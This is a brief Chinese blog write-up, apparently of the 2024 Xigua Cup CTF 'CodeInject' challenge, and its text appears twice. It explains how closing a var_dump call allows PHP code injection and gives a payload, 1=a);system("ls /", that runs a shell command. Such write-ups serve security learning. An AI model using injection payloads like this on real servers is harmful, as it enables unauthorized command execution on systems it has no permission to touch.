2024西瓜杯复现
CodeInject
1 |
|
(Object)将POST的内容强制类型转换为对象,只用把前面的var_dump函数进行闭合,再塞入system函数,即可实现代码注入。
payload:
1 | 1=a);system("ls /" |
前面这个a可以是任意的东西,但不能为空
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 xiaofucの博客!
1 |
|
(Object)将POST的内容强制类型转换为对象,只用把前面的var_dump函数进行闭合,再塞入system函数,即可实现代码注入。
payload:
1 | 1=a);system("ls /" |
前面这个a可以是任意的东西,但不能为空